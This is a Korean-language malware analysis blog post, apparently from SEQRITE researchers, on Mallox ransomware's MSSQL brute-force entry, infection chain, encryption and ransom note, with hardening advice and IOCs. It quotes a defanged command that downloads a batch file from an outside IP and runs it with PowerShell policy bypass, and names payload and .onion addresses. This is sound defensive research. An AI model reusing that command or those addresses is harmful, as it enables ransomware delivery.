소개 :
2021년 중반에 처음 발견된 말록스 랜섬웨어는 사이버 범죄 환경에서 강력한 위협으로 떠올랐습니다. 로컬 및 네트워크 공유 드라이브를 포함한 모든 볼륨을 암호화할 수 있는 능력을 통해, 말록스는 점차 시스템 통제권을 확대하여 피해자들을 디지털 절망에 빠뜨립니다.
Mallox 랜섬웨어는 암호화된 파일에 “.mallox” 확장자를 사용하며, 공격자와 사용자 간의 추가 통신을 위한 고유한 “Tor” 링크가 포함된 “File Recovery.txt”라는 이름의 ‘랜섬 노트’를 생성합니다.
이 블로그에서는 Mallox 랜섬웨어에 대한 우리의 연구 내용을 자세히 소개하고, 이 랜섬웨어가 얼마나 은밀하게 작동하는지 이해하는 데 도움을 드리고, 보호를 받는 방법에 대한 최신 정보를 알려드리겠습니다.
공격 벡터:
저희 조사에 따르면 Mallox(일명 TargetCompany) 랜섬웨어는 현재 보안되지 않은 Microsoft SQL 서버를 공격 벡터로 삼아 피해자의 시스템에 침투하고 랜섬웨어를 배포하고 있는 것으로 나타났습니다.
또한, 공개적으로 노출된 MSSQL 서버 에서 피해자 네트워크에 대한 초기 접근 권한을 획득하려는 시도가 여러 차례 실패하거나 오류를 범한 것을 확인했습니다 . 이러한 패턴은 MSSQL 무차별 대입 공격을 시사하며, 해당 서버들이 피해자 시스템에 대한 주요 진입점으로서 핵심적인 역할을 한다는 점을 강조합니다.
무차별 대입 공격을 통해 보안되지 않은 MSSQL 인스턴스에 대한 초기 접근 권한을 얻은 후, MSSQL 서비스 'sqlservr.exe' 명령줄을 사용하여 악성 파일과 페이로드를 피해자의 컴퓨터에 침투시키는 것으로 관찰되었습니다.
“C:\WINDOWS\\System32\\cmd.exe” /C echo $cl = New-Object System.Net.WebClient >%TEMP%\updt.ps1 & echo $cl.DownloadFile(“http[:]//43[.]138[.]76[.]102/Mfhigwwvsie[.]bat”, “%TEMP%\tzt.bat”) >> %TEMP%\updt.ps1 & powershell -ExecutionPolicy %TEMP%\updt.ps1 우회 & WMIC 프로세스 호출 “%TEMP%\tzt.bat” 생성
감염 사슬:
tzt.bat을 실행하는 동안 Aspnet_Complier.exe에 랜섬 코드를 삽입한 다음 killer.bat 파일을 삭제하고 실행합니다. 이 파일은 원치 않는 모든 서비스를 삭제하고 모든 작업을 중단시켜 암호화 프로세스가 성공적으로 진행되도록 합니다.

그림: 감염 사슬
탑재량에 대한 기술적 분석:
Bat 파일은 랜섬웨어 코드를 주입하는 .NET 페이로드 "Mfhigwwvise.exe"를 실행합니다.
.NET 페이로드를 분석하는 동안 "hxxps://files.catbox.moe/r6piiq.vdf"에서 AES 암호로 암호화된 또 다른 암호화된 VDF 페이로드를 다운로드한다는 사실이 발견되었습니다. 아래 그림과 같습니다.
이는 메모리에 직접 복호화됩니다.

그림: C2에서 VDF 다운로드

그림: 복호화된 VDF 페이로드
복호화된 DLL 파일은 IntelliLock 난독화 도구를 사용하여 추가로 난독화됩니다. 로더는 이제 프로세스 할로잉 기법을 사용하여 복호화된 랜섬웨어 DLL을 다른 프로세스에 로드합니다.
스레드 풀을 생성한 후 로더는 InvokeMember() 함수를 사용하여 랜섬웨어 코드를 Aspnet_Compler.exe에 주입하고 실행합니다.

그림: DLL 함수 호출
삽입된 랜섬 코드의 기술적 분석:
Mallox 랜섬웨어의 주입된 페이로드는 국가 확인, 섀도 복사본 삭제, 실행 중인 프로세스 종료 및 암호화를 포함하는 주요 모듈입니다.
첫째, 현재 사용자의 기본 언어 ID를 확인하여 일부 국가를 공격 대상에서 제외합니다.

그림: 언어 ID 확인
그런 다음 스레드를 생성합니다. 첫 번째 스레드는 레지스트리 키를 삭제하고, 그 다음에는 아래와 같이 섀도 복사본을 삭제합니다.

그림: 레지스트리 키 삭제

그림: 섀도 복사본 삭제
두 번째 스레드는 부팅 구성을 수정하고 일부 하드코딩된 프로세스를 종료합니다.
![]()
그림: 부팅 구성을 위한 BCD cmd 사용

그림: 프로세스 종료
그 후, 세 번째 스레드는 SQL 관련 서비스에서 사용된 명령줄을 제거합니다. 아래 그림과 같습니다.

그림: SQL 관련 서비스 제거
PC를 종료하거나 재부팅하려고 하면 ' PC를 종료하거나 재부팅하지 마십시오. 파일이 영구적으로 손상될 수 있습니다!' 라는 경고 메시지가 사용자에게 표시됩니다.
Windows 레지스트리를 수정하여 사용자가 시스템을 종료하거나 다시 시작할 수 없도록 합니다. 특정 레지스트리 값을 설정하면 종료, 다시 시작 및 로그아웃 옵션이 비활성화되어 사용자가 이러한 작업을 수행할 수 없게 됩니다.

그림: 시스템 옵션 비활성화
침투 시스템 정보
말록스 랜섬웨어는 암호화 전에 대상 시스템의 데이터를 유출할 수 있습니다. 다른 수많은 현대 랜섬웨어 조직의 일반적인 접근 방식과 마찬가지로, 말록스는 몸값 지불을 거부하는 피해자의 데이터를 노출하는 웹사이트를 운영합니다. 시스템 정보를 수집하여 C2C로 전송합니다.

그림: 데이터 유출 대상 시스템

그림: C2 서버 연결
암호화:
암호화 스레드는 기존 프로세서의 수를 기반으로 생성되며 최대 스레드 수는 64개입니다.

그림: 프로세서 수에 따른 암호화 스레드
폴더 및 파일 제외:
이 함수는 FindFirstFileExW API를 사용하여 모든 디렉터리를 탐색합니다 . 파일, 폴더 및 특정 확장자는 제외합니다.
또한 랜섬웨어 메모인 "File Recovery.txt"도 암호화 과정에서 제외됩니다.

그림: 허용 목록에 있는 폴더와 비교

그림: 안전 목록에 있는 확장자와 비교

그림: 허용 목록에 있는 파일과 비교

그림: 허용 목록에 있는 파일과 비교
" File Recovery.txt " 라는 이름의 랜섬웨어 메시지가 모든 폴더에 생성됩니다. 이 메시지에는 아래와 같이 공격자와 연락하여 암호 해독을 요청할 수 있는 Onion 링크가 포함되어 있습니다.
TOR 브라우저를 실행하고 사이트를 엽니다.
Wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad[.]onion[/]mallox[/]privateSignin

그림: 랜섬 노트 작성
sala20 암호화 알고리즘을 사용하여 샘플을 암호화합니다.

암호화 후에는 파일 확장자로 ".Mallox"가 추가됩니다.

이런 종류의 공격을 예방하기 위한 팁:
Mallox 랜섬웨어 공격을 방지하려면 Microsoft SQL Server 인스턴스 보안이 매우 중요합니다. SQL Server 환경의 보안을 강화하려면 다음 권장 단계를 따르세요.
- 방화벽 보호/액세스 제한: 방화벽을 사용하여 SQL 서버 접근을 제한하세요. 신뢰할 수 있는 네트워크 및 IP에서 들어오는 트래픽만 허용하세요. 특히, 권한이 있는 사용자를 제외하고 1433번 포트에서 들어오는 트래픽을 차단하세요.
- 기본 포트 변경: 해커의 주요 공격 대상이므로 인터넷을 통해 기본 포트(1433)에서 SQL 서버를 노출하지 마십시오. 원격으로 SQL 서버에 접속할 때는 VPN과 같은 보안 연결을 사용하는 것이 좋습니다.
- 안전한 계정 관리: 'sa'(시스템 관리자) 계정을 비활성화하거나 강력하고 고유한 비밀번호를 설정하여 무단 접근 위험을 최소화하세요. sa 계정은 높은 권한을 가지고 있습니다.
- 강력한 암호: 모든 SQL 로그인에 강력하고 고유한 비밀번호를 적용하세요. 대문자, 소문자, 숫자, 특수 문자를 조합하여 비밀번호 보안을 강화하세요.
- 계정 잠금 정책: 여러 번 실패하면 SQL Server 로그인을 일시적으로 차단하는 계정 잠금 정책을 구현하세요. 이렇게 하면 무차별 대입 공격을 방지할 수 있습니다.
- SQL CLR 어셈블리 감사: 필수적이지 않은 SQL CLR 어셈블리를 검토하고 비활성화하십시오. 잠재적인 취약점을 완화하기 위해 중복된 어셈블리를 정기적으로 평가하고 제거하십시오.
- 전송 중 데이터 암호화: 클라이언트와 SQL 서버 간 전송 시 SSL/TLS 프로토콜을 사용하여 데이터를 암호화하세요. 이를 통해 잠재적인 도청 및 데이터 가로채기를 방지할 수 있습니다.
- SQL Server 활동을 주시하세요: SQL Server 감사 기능을 활용하여 SQL Server 인스턴스 내의 모든 작업을 꼼꼼하게 추적하고 기록하세요. 이러한 활동을 적극적으로 모니터링함으로써 잠재적인 보안 위험을 신속하게 감지하고 해결할 수 있습니다.
- 최신 정보 유지: SQL Server 인스턴스, 운영 체제 및 기타 설치된 애플리케이션에 최신 업데이트와 패치를 정기적으로 적용하세요. 이렇게 하면 알려진 취약점을 완화하고 지속적인 보안을 유지하는 데 도움이 됩니다.
네트워크 내 공유 데이터 손상을 최소화하기 위한 예방 조치:
- 공유 폴더에 대한 액세스 제한: 네트워크 분리를 통해 공유 폴더에 대한 접근 권한을 필요한 사람으로만 제한하세요. 강력한 접근 제어를 적용하여 권한이 있는 사용자만 네트워크의 공유 데이터를 변경할 수 있도록 하세요.
- 정기적인 데이터 백업: 공유 데이터를 안전하고 격리된 장소에 지속적으로 백업하십시오. 데이터 무결성을 검증하고 공격 발생 시 신속한 데이터 복구 프로세스를 보장하기 위해 백업을 정기적으로 테스트하십시오.
- 예약된 오프라인 백업: 라이브/온라인 백업을 암호화하려는 랜섬웨어 공격으로부터 보호하기 위해 중요한 공유 데이터의 오프라인 백업을 유지하세요.
이러한 예방 조치를 준수함으로써 Microsoft SQL Server 인스턴스를 표적으로 삼는 Mallox 랜섬웨어 공격의 위험을 크게 줄이고 환경의 전반적인 보안 태세를 강화할 수 있습니다.
어떻게합니까 SEQRITE Mallox 랜섬웨어로부터 고객을 보호하시겠습니까?
SEQRITE해당 안티바이러스 프로그램은 공격에 사용된 다양한 스크립트 파일과 랜섬웨어 페이로드에 대한 시그니처를 보유하고 있습니다. 이 랜섬웨어에 대한 시그니처는 다음과 같습니다.
- 랜섬.말록스.S28994722
- PS.다운로더.박스터.47436
- BAT.에이전트.CQ
- 스크립트.트로이-다운로더.A8341828
- 스크립트.트로이.A8269601
더 자세히 알아보려면 SEQRITE당사의 다양한 디지털 보호 솔루션을 보시려면 다음 링크를 방문하십시오.
결론 :
사이버 위협이 점점 더 정교해짐에 따라, Mallox 랜섬웨어는 은밀하고 끊임없이 진화하는 적으로 등장했습니다.
보안이 취약한 MSSQL 서버를 시작점으로 삼는 것이 그들의 전략입니다. 일단 침투하면, 암호화라는 장막 아래 악성 파일들을 조합하여 시스템 프로세스에 혼란을 야기하는 복잡한 감염 사슬을 펼칩니다.
복잡한 악의의 실마리를 가진 말록스 랜섬웨어는 취약점을 노려 디지털 세상을 위험한 전쟁터로 만들어버립니다. 전형적인 디지털 인질극으로, 당신의 요구는 명확합니다. 소중한 데이터나 자유를 위한 대가로 돈을 요구하는 것이죠!
SEQRITE'의 시그니처 기반 보호 기능은 이 랜섬웨어 변종에 대한 방어 기능을 제공합니다.
MITRE ATT&CK TTP:
| 명령 및 스크립팅 해석기 | T1059 |
| 시스템 복구 억제 | T1490 |
| 파일 및 디렉토리 검색 | T1083 |
| 시스템 정보 검색 | T1082 |
| 영향력을 위해 암호화된 데이터 | T1486 |
| 서비스 중지 | T1489 |
IOC:
배트 로더:
77BFCEE98F086C8E25A69D252A6609E1
08D4D184E6E3484E8B676FA0E0A24AFA
페이로드 :
1B7578D04324CD6C8BF11985B79A814A
저자 :
소우멘 버마
바이바브 빌라데
우마르 칸



